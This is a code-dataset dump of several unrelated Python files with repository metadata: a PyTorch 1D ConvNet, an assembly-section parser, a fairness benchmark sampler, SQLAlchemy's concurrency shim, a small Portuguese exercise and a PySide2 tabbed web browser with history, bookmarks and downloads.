nn.Conv1d(out_channel, out_channel, kernel_size=kernel_size, stride=1, padding=kernel_size // 2,
bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=True)
)
def forward(self, x):
out = self.layers(x)
return out
class ConvNet1D(nn.Module):
def __init__(self, basic_block: nn.Module, in_channel: int, hidden_channel: int, kernel_size: Union[int, List[int]],
stride: Union[int, List[int]], num_layers: List[int], classes: int):
"""
Args:
basic_block ():
in_channel ():
hidden_channel ():
kernel_size ():
stride ():
num_layers ():
classes ():
"""
super(ConvNet1D, self).__init__()
if isinstance(kernel_size, int):
kernel_size = [kernel_size] * len(num_layers)
if isinstance(stride, int):
stride = [stride] * len(num_layers)
assert len(kernel_size) == len(stride) == len(num_layers)
self.head = nn.Sequential(
nn.Conv1d(in_channel, hidden_channel, kernel_size=7, stride=2, padding=3, bias=False),
nn.BatchNorm1d(hidden_channel),
nn.ReLU(inplace=True),
nn.MaxPool1d(kernel_size=3, stride=2, padding=1)
)
self.in_channel = hidden_channel
conv_layers = []
for i, nl in enumerate(num_layers):
conv_layers.append(self.__make_layer(basic_block, nl, self.in_channel * 2, kernel_size[i], stride[i]))
self.conv_layers = nn.Sequential(*conv_layers)
self.avg_pool = nn.AdaptiveAvgPool1d(1)
self.fc = nn.Linear(self.in_channel, classes)
for m in self.modules():
if isinstance(m, nn.Conv1d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def __make_layer(self, block, num_blocks, out_channel, kernel_size, stride):
layers = []
layers.append(block(self.in_channel, out_channel, kernel_size, stride))
self.in_channel = out_channel
for _ in range(1, num_blocks):
layers.append(block(self.in_channel, out_channel, kernel_size, 1))
return nn.Sequential(*layers)
def forward(self, x):
out = self.head(x)
out = self.conv_layers(out)
out = self.avg_pool(out)
out = out.squeeze()
out = self.fc(out)
return out
def resnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(ResidualBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
def convnet_1d(in_channel: int, classes: int):
"""
Args:
in_channel ():
classes ():
Returns:
"""
return ConvNet1D(BasicConvBlock1D, in_channel=in_channel, hidden_channel=16, kernel_size=[7, 11, 11, 7],
stride=[1, 2, 2, 2], num_layers=[2, 2, 2, 2], classes=classes)
| 694 | 2,574 | 73 |
c03436a7fad26632d614882809f30726de11f657 | 2,426 | py | Python | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | asm_section_list.py | PsiLupan/calcprogress | 05b77e1eedb7726c34f545e10837283e2a1c6180 | [
"MIT"
] | null | null | null | from os.path import basename
from enum import IntEnum
from re import search
from dataclasses import dataclass
from cw_map import Map
SECTION_REGEX = r"^\s*.section\s+(?P<Name>.[a-zA-Z0-9_$]+)"
@dataclass
@dataclass | 33.232877 | 108 | 0.609233 | from os.path import basename
from enum import IntEnum
from re import search
from dataclasses import dataclass
from cw_map import Map
SECTION_REGEX = r"^\s*.section\s+(?P<Name>.[a-zA-Z0-9_$]+)"
class AsmSectionType(IntEnum):
CODE = 0
DATA = 1
def get_section_type(name: str) -> int:
code = [
".init", ".text"
]
data = [
"extab_", "extab", "._extab", "._exidx", "extabindex_", "extabindex", ".ctors", ".dtors", "._ctors",
"._dtors", ".file", ".rodata", ".data", ".bss", ".sdata", ".sbss", ".sdata2", ".sbss2"
]
if name in code:
return AsmSectionType.CODE
elif name in data:
return AsmSectionType.DATA
# As a failsafe, if the section is actually unknown,
# it is probably some unique data (like OGWS' ".file" section)
print(f"Unidentifiable section! ({name})")
print("Assuming this is a DATA section.")
return AsmSectionType.DATA
def get_obj_name(path: str) -> str:
# Get base file name
file_name = basename(path)
# Extract file extension/name
dot_idx = file_name.rfind(".")
file_ext = file_name[dot_idx:]
file_name = file_name[:dot_idx]
# Create object file name
return f"{file_name}.o"
@dataclass
class AsmSection:
start: int
size: int
type: int
@dataclass
class AsmSectionList:
sections: list[AsmSection]
def __init__(self, sources: list[str], dol_map: Map):
self.sections = []
for file in sources:
self.parse_file(file, dol_map)
def parse_file(self, path: str, dol_map: Map):
# Read asm
with open(path, "r") as f:
asm = f.readlines()
# Find sections in asm file by looking for .section directives
for i in range(len(asm)):
sect_match = search(SECTION_REGEX, asm[i])
if sect_match != None:
# Section name
sect_name = sect_match.group("Name")
# Header symbols in current object file
my_file_headers = dol_map.headers[get_obj_name(path)]
# Header symbol for current section
my_header = my_file_headers[sect_name]
# Create summable section object
section = AsmSection(my_header.virt_ofs, my_header.size, get_section_type(sect_name))
assert section.start > 0 and section.size >= 0
self.sections.append(section) | 1,933 | 163 | 113 |
3f434402ab6b899eb8a437532d2a06a2478f1d60 | 420 | py | Python | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-11-05T20:40:40.000Z | 2020-09-16T03:13:54.000Z | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | python/verifair/benchmarks/fairsquare/M_ind_F_DT_V2_D2_N4_Q.py | obastani/verifair | 1d5efea041330fa9fe8d59d976bdd3ef97aff417 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | from .helper import *
| 21 | 53 | 0.530952 | from .helper import *
def sample(flag):
age = gaussian(38.5816, 186.0614)
sex = step([(0,1,0.3307), (1,2,0.6693)])
capital_gain = gaussian(1077.6488, 54542539.1784)
sensitiveAttribute(sex < 1, flag)
qualified(age > 18)
if capital_gain >= 7073.5:
if age < 20:
t = 1
else:
t = 0
else:
t = 1
return int(t < 0.5)
fairnessTarget(t < 0.5)
| 374 | 0 | 23 |
50a21fa1ba0699c266edb93afac706ea38cec3d1 | 168 | py | Python | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | Ex110/teste.py | MoomenEltelbany/PythonDesafios | aa2f44d3104cf3607f58dc42c2f8fc8023f128de | [
"MIT"
] | null | null | null | import moeda
p = float(input("Digite um preço: R$"))
aum = int(input("Aumento de quantos %: "))
red = int(input('Reduzindo de quantos %: '))
moeda.resumo(p, aum, red)
| 24 | 44 | 0.654762 | import moeda
p = float(input("Digite um preço: R$"))
aum = int(input("Aumento de quantos %: "))
red = int(input('Reduzindo de quantos %: '))
moeda.resumo(p, aum, red)
| 0 | 0 | 0 |
5d15e06dec0ce3bc088257a379898cb0910aead0 | 1,911 | py | Python | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 1 | 2021-09-22T13:14:37.000Z | 2021-09-22T13:14:37.000Z | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 11 | 2021-10-01T01:23:13.000Z | 2021-10-09T23:40:39.000Z | ambiente_virtual/Lib/site-packages/sqlalchemy/util/concurrency.py | PI-UNIVESP-Penapolis/PRODEA | 1ced58f52bace8b6de0de3c6516b9fb7231da09c | [
"MIT"
] | 1 | 2021-11-28T07:12:08.000Z | 2021-11-28T07:12:08.000Z | from . import compat
have_greenlet = False
if compat.py3k:
try:
import greenlet # noqa F401
except ImportError:
pass
else:
have_greenlet = True
from ._concurrency_py3k import await_only
from ._concurrency_py3k import await_fallback
from ._concurrency_py3k import greenlet_spawn
from ._concurrency_py3k import is_exit_exception
from ._concurrency_py3k import AsyncAdaptedLock
from ._concurrency_py3k import _util_async_run # noqa F401
from ._concurrency_py3k import (
_util_async_run_coroutine_function,
) # noqa F401, E501
from ._concurrency_py3k import asyncio # noqa F401
from ._concurrency_py3k import asynccontextmanager
if not have_greenlet:
asyncio = None # noqa F811
| 29.859375 | 75 | 0.643642 | from . import compat
have_greenlet = False
if compat.py3k:
try:
import greenlet # noqa F401
except ImportError:
pass
else:
have_greenlet = True
from ._concurrency_py3k import await_only
from ._concurrency_py3k import await_fallback
from ._concurrency_py3k import greenlet_spawn
from ._concurrency_py3k import is_exit_exception
from ._concurrency_py3k import AsyncAdaptedLock
from ._concurrency_py3k import _util_async_run # noqa F401
from ._concurrency_py3k import (
_util_async_run_coroutine_function,
) # noqa F401, E501
from ._concurrency_py3k import asyncio # noqa F401
from ._concurrency_py3k import asynccontextmanager
if not have_greenlet:
asyncio = None # noqa F811
def _not_implemented():
# this conditional is to prevent pylance from considering
# greenlet_spawn() etc as "no return" and dimming out code below it
if have_greenlet:
return None
if not compat.py3k:
raise ValueError("Cannot use this function in py2.")
else:
raise ValueError(
"the greenlet library is required to use this function."
)
def is_exit_exception(e): # noqa F811
return not isinstance(e, Exception)
def await_only(thing): # noqa F811
_not_implemented()
def await_fallback(thing): # noqa F81
return thing
def greenlet_spawn(fn, *args, **kw): # noqa F81
_not_implemented()
def AsyncAdaptedLock(*args, **kw): # noqa F81
_not_implemented()
def _util_async_run(fn, *arg, **kw): # noqa F81
return fn(*arg, **kw)
def _util_async_run_coroutine_function(fn, *arg, **kw): # noqa F81
_not_implemented()
def asynccontextmanager(fn, *arg, **kw): # noqa F81
_not_implemented()
| 853 | 0 | 243 |
b591102aafffac7a88830c9091f7ea089ba3c7dd | 46,710 | py | Python | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | PythonPrograms/Dyn/Dynobite/Dynobite with Downloads.py | abhinavsatheesh/Python | 9ae1a7a040522f5989c34f17d2d0764b301fa23a | [
"Apache-2.0"
] | null | null | null | from tkPDFViewer import tkPDFViewer as pdf
from tkinter import *
from PySide2 import QtCore
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from PySide2.QtWebEngineWidgets import *
from PySide2 import QtCore
from functools import partial
import json
import validators
import sys
import os
_web_actions = [QWebEnginePage.Back, QWebEnginePage.Forward,
QWebEnginePage.Reload,
QWebEnginePage.Undo, QWebEnginePage.Redo,
QWebEnginePage.Cut, QWebEnginePage.Copy,
QWebEnginePage.Paste, QWebEnginePage.SelectAll]
# A Find tool bar (bottom area)
class DownloadWidget(QProgressBar):
"""Lets you track progress of a QWebEngineDownloadItem."""
finished = QtCore.Signal()
remove_requested = QtCore.Signal()
@staticmethod
@staticmethod
class BrowserTabWidget(QTabWidget):
"""Enables having several tabs with QWebEngineView."""
url_changed = QtCore.Signal(QUrl)
enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
download_requested = QtCore.Signal(QWebEngineDownloadItem)
_url_role = Qt.UserRole + 1
# Default bookmarks as an array of arrays which is the form
# used to read from/write to a .json bookmarks file
_default_bookmarks = [
['Tool Bar'],
]
_bookmark_file = 'bookmarks.json'
# Create the model from an array of arrays
# Serialize model into an array of arrays, writing out the icons
# into .png files under directory in the process
# Bookmarks as a tree view to be used in a dock widget with
# functionality to persist and populate tool bars and menus.
class BookmarkWidget(QTreeView):
"""Provides a tree view to manage the bookmarks."""
open_bookmark = QtCore.Signal(QUrl)
open_bookmark_in_new_tab = QtCore.Signal(QUrl)
changed = QtCore.Signal()
# Synchronize the bookmarks under parent_item to a target_object
# like QMenu/QToolBar, which has a list of actions. Update
# the existing actions, append new ones if needed or hide
# superfluous ones
# Return a short title for a bookmark action,
# "Qt | Cross Platform.." -> "Qt"
@staticmethod
main_windows = []
cwd = os.getcwd()
DYNOBITEFILES = "Dynobite Files"
DynobiteCreateFolder = os.path.join(cwd, DYNOBITEFILES)
DynobiteHistoryFolder = os.path.join(DYNOBITEFILES, "History.txt")
print("Dynobite\nVersion 94.0.992.31")
try:
os.mkdir(DynobiteCreateFolder)
except FileExistsError:
pass
picturefolder = "Images"
completedir = os.path.join(DynobiteCreateFolder, picturefolder)
try:
os.mkdir(completedir)
url="https://raw.githubusercontent.com/abhinavsatheesh/dynfiles/main/Dynobite/Images/1.png"
downloadpath=completedir
download(url,f'{downloadpath}/1.png')
except FileExistsError:
pass
def create_main_window():
"""Creates a MainWindow using 75% of the available screen resolution."""
main_win = MainWindow()
main_windows.append(main_win)
available_geometry = app.desktop().availableGeometry(main_win)
main_win.resize(available_geometry.width() * 2 / 3,
available_geometry.height() * 2 / 3)
main_win.show()
return main_win
def create_main_window_with_browser():
"""Creates a MainWindow with a BrowserTabWidget."""
main_win = create_main_window()
return main_win.add_browser_tab()
class MainWindow(QMainWindow):
"""Provides the parent window that includes the BookmarkWidget,
BrowserTabWidget, and a DownloadWidget, to offer the complete
web browsing experience."""
if __name__ == '__main__':
app = QApplication(sys.argv)
main_win = create_main_window()
initial_urls = sys.argv[1:]
if not initial_urls:
initial_urls.append('https://www.google.com')
for url in initial_urls:
main_win.load_url_in_new_tab(QUrl.fromUserInput(url))
exit_code = app.exec_()
main_win.write_bookmarks()
sys.exit(exit_code)
| 37.97561 | 165 | 0.628709 | from tkPDFViewer import tkPDFViewer as pdf
from tkinter import *
from PySide2 import QtCore
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from PySide2.QtWebEngineWidgets import *
from PySide2 import QtCore
from functools import partial
import json
import validators
import sys
import os
_web_actions = [QWebEnginePage.Back, QWebEnginePage.Forward,
QWebEnginePage.Reload,
QWebEnginePage.Undo, QWebEnginePage.Redo,
QWebEnginePage.Cut, QWebEnginePage.Copy,
QWebEnginePage.Paste, QWebEnginePage.SelectAll]
class WebEngineView(QWebEngineView):
enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
@staticmethod
def web_actions():
return _web_actions
@staticmethod
def minimum_zoom_factor():
return 5
@staticmethod
def maximum_zoom_factor():
return 5
def __init__(self, tab_factory_func, window_factory_func):
super(WebEngineView, self).__init__()
self._tab_factory_func = tab_factory_func
self._window_factory_func = window_factory_func
page = self.page()
self._actions = {}
for web_action in WebEngineView.web_actions():
action = page.action(web_action)
action.changed.connect(self._enabled_changed)
self._actions[action] = web_action
def is_web_action_enabled(self, web_action):
return self.page().action(web_action).isEnabled()
def createWindow(self, window_type):
if (window_type == QWebEnginePage.WebBrowserTab or
window_type == QWebEnginePage.WebBrowserBackgroundTab):
return self._tab_factory_func()
return self._window_factory_func()
def _enabled_changed(self):
action = self.sender()
web_action = self._actions[action]
self.enabled_changed.emit(web_action, action.isEnabled())
class HistoryModel(QAbstractTableModel):
def __init__(self, history, parent=None):
super(HistoryModel, self).__init__(parent)
self._history = history
def headerData(self, section, orientation, role=Qt.DisplayRole):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return 'Web Page' if section == 0 else 'URL'
return None
def rowCount(self, index=QModelIndex()):
return self._history.count()
def columnCount(self, index=QModelIndex()):
return 2
def item_at(self, model_index):
return self._history.itemAt(model_index.row())
def data(self, index, role=Qt.DisplayRole):
item = self.item_at(index)
column = index.column()
if role == Qt.DisplayRole:
return item.title() if column == 0 else item.url().toString()
return None
def refresh(self):
self.beginResetModel()
self.endResetModel()
class HistoryWindow(QTreeView):
open_url = Signal(QUrl)
def __init__(self, history, parent):
super(HistoryWindow, self).__init__(parent)
self._model = HistoryModel(history, self)
self.setModel(self._model)
self.activated.connect(self._activated)
screen = QApplication.desktop().screenGeometry(parent)
self.resize(screen.width() / 3, screen.height() / 3)
self._adjustSize()
def refresh(self):
self._model.refresh()
self._adjustSize()
def _adjustSize(self):
if (self._model.rowCount() > 0):
self.resizeColumnToContents(0)
def _activated(self, index):
item = self._model.item_at(index)
self.open_url.emit(item.url())
# A Find tool bar (bottom area)
class FindToolBar(QToolBar):
find = QtCore.Signal(str, QWebEnginePage.FindFlags)
def __init__(self):
super(FindToolBar, self).__init__()
self._line_edit = QLineEdit()
self._line_edit.setClearButtonEnabled(True)
self._line_edit.setPlaceholderText("Find...")
self._line_edit.setMaximumWidth(300)
self._line_edit.returnPressed.connect(self._find_next)
self.addWidget(self._line_edit)
self._previous_button = QToolButton()
style_icons = ':/qt-project.org/styles/commonstyle/images/'
self._previous_button.setIcon(QIcon(style_icons + 'up-32.png'))
self._previous_button.clicked.connect(self._find_previous)
self.addWidget(self._previous_button)
self._next_button = QToolButton()
self._next_button.setIcon(QIcon(style_icons + 'down-32.png'))
self._next_button.clicked.connect(self._find_next)
self.addWidget(self._next_button)
self._case_sensitive_checkbox = QCheckBox('Case Sensitive')
self.addWidget(self._case_sensitive_checkbox)
self._hideButton = QToolButton()
self._hideButton.setShortcut(QKeySequence(Qt.Key_Escape))
self._hideButton.setIcon(QIcon(style_icons + 'closedock-16.png'))
self._hideButton.clicked.connect(self.hide)
self.addWidget(self._hideButton)
def focus_find(self):
self._line_edit.setFocus()
def _emit_find(self, backward):
needle = self._line_edit.text().strip()
if needle:
flags = QWebEnginePage.FindFlags()
if self._case_sensitive_checkbox.isChecked():
flags |= QWebEnginePage.FindCaseSensitively
if backward:
flags |= QWebEnginePage.FindBackward
self.find.emit(needle, flags)
def _find_next(self):
self._emit_find(False)
def _find_previous(self):
self._emit_find(True)
class DownloadWidget(QProgressBar):
"""Lets you track progress of a QWebEngineDownloadItem."""
finished = QtCore.Signal()
remove_requested = QtCore.Signal()
def __init__(self, download_item):
super(DownloadWidget, self).__init__()
self._download_item = download_item
download_item.finished.connect(self._finished)
download_item.downloadProgress.connect(self._download_progress)
download_item.stateChanged.connect(self._update_tool_tip())
path = download_item.path()
self.setMaximumWidth(300)
# Shorten 'PySide2-5.11.0a1-5.11.0-cp36-cp36m-linux_x86_64.whl'...
description = QFileInfo(path).fileName()
description_length = len(description)
if description_length > 30:
description = '{}...{}'.format(description[0:10],
description[description_length - 10:])
self.setFormat('{} %p%'.format(description))
self.setOrientation(Qt.Horizontal)
self.setMinimum(0)
self.setValue(0)
self.setMaximum(100)
self._update_tool_tip()
# Force progress bar text to be shown on macoS by using 'fusion' style
if sys.platform == 'darwin':
self.setStyle(QStyleFactory.create('fusion'))
@staticmethod
def open_file(file):
QDesktopServices.openUrl(QUrl.fromLocalFile(file))
@staticmethod
def open_download_directory():
path = QStandardPaths.writableLocation(QStandardPaths.DownloadLocation)
DownloadWidget.open_file(path)
def state(self):
return self._download_item.state()
def _update_tool_tip(self):
path = self._download_item.path()
tool_tip = "{}\n{}".format(self._download_item.url().toString(),
QDir.toNativeSeparators(path))
total_bytes = self._download_item.totalBytes()
if total_bytes > 0:
tool_tip += "\n{}K".format(total_bytes / 1024)
state = self.state()
if state == QWebEngineDownloadItem.DownloadRequested:
tool_tip += "\n(requested)"
elif state == QWebEngineDownloadItem.DownloadInProgress:
tool_tip += "\n(downloading)"
elif state == QWebEngineDownloadItem.DownloadCompleted:
tool_tip += "\n(completed)"
elif state == QWebEngineDownloadItem.DownloadCancelled:
tool_tip += "\n(cancelled)"
else:
tool_tip += "\n(interrupted)"
self.setToolTip(tool_tip)
def _download_progress(self, bytes_received, bytes_total):
self.setValue(int(100 * bytes_received / bytes_total))
def _finished(self):
self._update_tool_tip()
self.finished.emit()
def _launch(self):
DownloadWidget.open_file(self._download_item.path())
def mouseDoubleClickEvent(self, event):
if self.state() == QWebEngineDownloadItem.DownloadCompleted:
self._launch()
def contextMenuEvent(self, event):
state = self.state()
context_menu = QMenu()
launch_action = context_menu.addAction("Launch")
launch_action.setEnabled(state == QWebEngineDownloadItem.DownloadCompleted)
show_in_folder_action = context_menu.addAction("Show in Folder")
show_in_folder_action.setEnabled(state == QWebEngineDownloadItem.DownloadCompleted)
cancel_action = context_menu.addAction("Cancel")
cancel_action.setEnabled(state == QWebEngineDownloadItem.DownloadInProgress)
remove_action = context_menu.addAction("Remove")
remove_action.setEnabled(state != QWebEngineDownloadItem.DownloadInProgress)
chosen_action = context_menu.exec_(event.globalPos())
if chosen_action == launch_action:
self._launch()
elif chosen_action == show_in_folder_action:
path = QFileInfo(self._download_item.path()).absolutePath()
DownloadWidget.open_file(path)
elif chosen_action == cancel_action:
self._download_item.cancel()
elif chosen_action == remove_action:
self.remove_requested.emit()
class BrowserTabWidget(QTabWidget):
"""Enables having several tabs with QWebEngineView."""
url_changed = QtCore.Signal(QUrl)
enabled_changed = QtCore.Signal(QWebEnginePage.WebAction, bool)
download_requested = QtCore.Signal(QWebEngineDownloadItem)
def __init__(self, window_factory_function):
super(BrowserTabWidget, self).__init__()
self.setTabsClosable(True)
self._window_factory_function = window_factory_function
self._webengineviews = []
self._history_windows = {} # map WebengineView to HistoryWindow
self.currentChanged.connect(self._current_changed)
self.tabCloseRequested.connect(self.handle_tab_close_request)
self._actions_enabled = {}
for web_action in WebEngineView.web_actions():
self._actions_enabled[web_action] = False
tab_bar = self.tabBar()
tab_bar.setSelectionBehaviorOnRemove(QTabBar.SelectPreviousTab)
tab_bar.setContextMenuPolicy(Qt.CustomContextMenu)
tab_bar.customContextMenuRequested.connect(self._handle_tab_context_menu)
def add_browser_tab(self):
qurl = QUrl("https://www.google.com")
factory_func = partial(BrowserTabWidget.add_browser_tab, self)
web_engine_view = WebEngineView(factory_func,
self._window_factory_function)
index = self.count()
web_engine_view.setUrl(qurl)
self._webengineviews.append(web_engine_view)
title = 'Tab {}'.format(index + 1)
self.addTab(web_engine_view, title)
page = web_engine_view.page()
page.titleChanged.connect(self._title_changed)
page.iconChanged.connect(self._icon_changed)
page.profile().downloadRequested.connect(self._download_requested)
web_engine_view.urlChanged.connect(self._url_changed)
web_engine_view.enabled_changed.connect(self._enabled_changed)
self.setCurrentIndex(index)
return web_engine_view
def _on_fullscreen_requested(self, request):
request.accept()
on = request.toggleOn()
def load(self, url):
index = self.currentIndex()
if index >= 0 and url.isValid():
self._webengineviews[index].setUrl(url)
def find(self, needle, flags):
index = self.currentIndex()
if index >= 0:
self._webengineviews[index].page().findText(needle, flags)
def url(self):
index = self.currentIndex()
return self._webengineviews[index].url() if index >= 0 else QUrl()
def _url_changed(self, url):
index = self.currentIndex()
if index >= 0 and self._webengineviews[index] == self.sender():
self.url_changed.emit(url)
def _title_changed(self, title):
index = self._index_of_page(self.sender())
if (index >= 0):
self.setTabText(index, BookmarkWidget.short_title(title))
def _icon_changed(self, icon):
index = self._index_of_page(self.sender())
if (index >= 0):
self.setTabIcon(index, icon)
def _enabled_changed(self, web_action, enabled):
index = self.currentIndex()
if index >= 0 and self._webengineviews[index] == self.sender():
self._check_emit_enabled_changed(web_action, enabled)
def _check_emit_enabled_changed(self, web_action, enabled):
if enabled != self._actions_enabled[web_action]:
self._actions_enabled[web_action] = enabled
self.enabled_changed.emit(web_action, enabled)
def _current_changed(self, index):
self._update_actions(index)
self.url_changed.emit(self.url())
def _update_actions(self, index):
if index >= 0 and index < len(self._webengineviews):
view = self._webengineviews[index]
for web_action in WebEngineView.web_actions():
enabled = view.is_web_action_enabled(web_action)
self._check_emit_enabled_changed(web_action, enabled)
def back(self):
self._trigger_action(QWebEnginePage.Back)
def forward(self):
self._trigger_action(QWebEnginePage.Forward)
def reload(self):
self._trigger_action(QWebEnginePage.Reload)
def undo(self):
self._trigger_action(QWebEnginePage.Undo)
def redo(self):
self._trigger_action(QWebEnginePage.Redo)
def cut(self):
self._trigger_action(QWebEnginePage.Cut)
def copy(self):
self._trigger_action(QWebEnginePage.Copy)
def paste(self):
self._trigger_action(QWebEnginePage.Paste)
def select_all(self):
self._trigger_action(QWebEnginePage.SelectAll)
def show_history(self):
index = self.currentIndex()
if index >= 0:
webengineview = self._webengineviews[index]
history_window = self._history_windows.get(webengineview)
if not history_window:
history = webengineview.page().history()
history_window = HistoryWindow(history, self)
history_window.open_url.connect(self.load)
history_window.setWindowFlags(history_window.windowFlags()
| Qt.Window)
history_window.setWindowTitle('History')
self._history_windows[webengineview] = history_window
else:
history_window.refresh()
history_window.show()
history_window.raise_()
def zoom_factor(self):
return self._webengineviews[0].zoomFactor() if self._webengineviews else 1.0
def set_zoom_factor(self, z):
for w in self._webengineviews:
w.setZoomFactor(z)
def _handle_tab_context_menu(self, point):
index = self.tabBar().tabAt(point)
if index < 0:
return
tab_count = len(self._webengineviews)
context_menu = QMenu()
new_tab_action = context_menu.addAction("New Tab")
refresh_action = context_menu.addAction("Reload")
duplicate_tab_action = context_menu.addAction("Duplicate Tab")
close_other_tabs_action = context_menu.addAction("Close Other Tabs")
close_other_tabs_action.setEnabled(tab_count > 1)
close_tabs_to_the_right_action = context_menu.addAction("Close Tabs to the Right")
close_tabs_to_the_right_action.setEnabled(index < tab_count - 1)
close_tab_action = context_menu.addAction("&Close Tab")
chosen_action = context_menu.exec_(self.tabBar().mapToGlobal(point))
if chosen_action == duplicate_tab_action:
current_url = self.url()
self.add_browser_tab().load(current_url)
elif chosen_action == new_tab_action:
current_url = "https://www.google.com"
self.add_browser_tab().load(current_url)
elif chosen_action == refresh_action:
self.reload()
elif chosen_action == close_other_tabs_action:
for t in range(tab_count - 1, -1, -1):
if t != index:
self.handle_tab_close_request(t)
elif chosen_action == close_tabs_to_the_right_action:
for t in range(tab_count - 1, index, -1):
self.handle_tab_close_request(t)
elif chosen_action == close_tab_action:
self.handle_tab_close_request(index)
def handle_tab_close_request(self, index):
if (index >= 0 and self.count() > 1):
webengineview = self._webengineviews[index]
if self._history_windows.get(webengineview):
del self._history_windows[webengineview]
self._webengineviews.remove(webengineview)
self.removeTab(index)
def close_current_tab(self):
self.handle_tab_close_request(self.currentIndex())
def _trigger_action(self, action):
index = self.currentIndex()
if index >= 0:
self._webengineviews[index].page().triggerAction(action)
def _index_of_page(self, web_page):
for p in range(0, len(self._webengineviews)):
if (self._webengineviews[p].page() == web_page):
return p
return -1
def _download_requested(self, item):
self.download_requested.emit(item)
_url_role = Qt.UserRole + 1
# Default bookmarks as an array of arrays which is the form
# used to read from/write to a .json bookmarks file
_default_bookmarks = [
['Tool Bar'],
]
def _config_dir():
return '{}/QtForPythonBrowser'.format(
QStandardPaths.writableLocation(QStandardPaths.ConfigLocation))
_bookmark_file = 'bookmarks.json'
def _create_folder_item(title):
result = QStandardItem(title)
result.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
return result
def _create_item(url, title, icon):
result = QStandardItem(title)
result.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
result.setData(url, _url_role)
if icon is not None:
result.setIcon(icon)
return result
# Create the model from an array of arrays
def _create_model(parent, serialized_bookmarks):
result = QStandardItemModel(0, 1, parent)
last_folder_item = None
for entry in serialized_bookmarks:
if len(entry) == 1:
last_folder_item = _create_folder_item(entry[0])
result.appendRow(last_folder_item)
else:
url = QUrl.fromUserInput(entry[0])
title = entry[1]
icon = QIcon(entry[2]) if len(entry) > 2 and entry[2] else None
last_folder_item.appendRow(_create_item(url, title, icon))
return result
# Serialize model into an array of arrays, writing out the icons
# into .png files under directory in the process
def _serialize_model(model, directory):
result = []
folder_count = model.rowCount()
for f in range(0, folder_count):
folder_item = model.item(f)
result.append([folder_item.text()])
item_count = folder_item.rowCount()
for i in range(0, item_count):
item = folder_item.child(i)
entry = [item.data(_url_role).toString(), item.text()]
icon = item.icon()
if not icon.isNull():
icon_sizes = icon.availableSizes()
largest_size = icon_sizes[len(icon_sizes) - 1]
icon_file_name = '{}/icon{:02}_{:02}_{}.png'.format(directory,
f, i,
largest_size.width())
icon.pixmap(largest_size).save(icon_file_name, 'PNG')
entry.append(icon_file_name)
result.append(entry)
return result
# Bookmarks as a tree view to be used in a dock widget with
# functionality to persist and populate tool bars and menus.
class BookmarkWidget(QTreeView):
"""Provides a tree view to manage the bookmarks."""
open_bookmark = QtCore.Signal(QUrl)
open_bookmark_in_new_tab = QtCore.Signal(QUrl)
changed = QtCore.Signal()
def __init__(self):
super(BookmarkWidget, self).__init__()
self.setRootIsDecorated(False)
self.setUniformRowHeights(True)
self.setHeaderHidden(True)
self._model = _create_model(self, self._read_bookmarks())
self.setModel(self._model)
self.expandAll()
self.activated.connect(self._activated)
self._model.rowsInserted.connect(self._changed)
self._model.rowsRemoved.connect(self._changed)
self._model.dataChanged.connect(self._changed)
self._modified = False
self.customContextMenuRequested.connect(self.context_menu_event)
def _changed(self):
self._modified = True
self.changed.emit()
def _activated(self, index):
item = self._model.itemFromIndex(index)
self.open_bookmark.emit(item.data(_url_role))
def _action_activated(self, index):
action = self.sender()
self.open_bookmark.emit(action.data())
def _tool_bar_item(self):
return self._model.item(0, 0)
def _other_item(self):
return self._model.item(1, 0)
def add_bookmark(self, url, title, icon):
self._other_item().appendRow(_create_item(url, title, icon))
def add_tool_bar_bookmark(self, url, title, icon):
self._tool_bar_item().appendRow(_create_item(url, title, icon))
# Synchronize the bookmarks under parent_item to a target_object
# like QMenu/QToolBar, which has a list of actions. Update
# the existing actions, append new ones if needed or hide
# superfluous ones
def _populate_actions(self, parent_item, target_object, first_action):
existing_actions = target_object.actions()
existing_action_count = len(existing_actions)
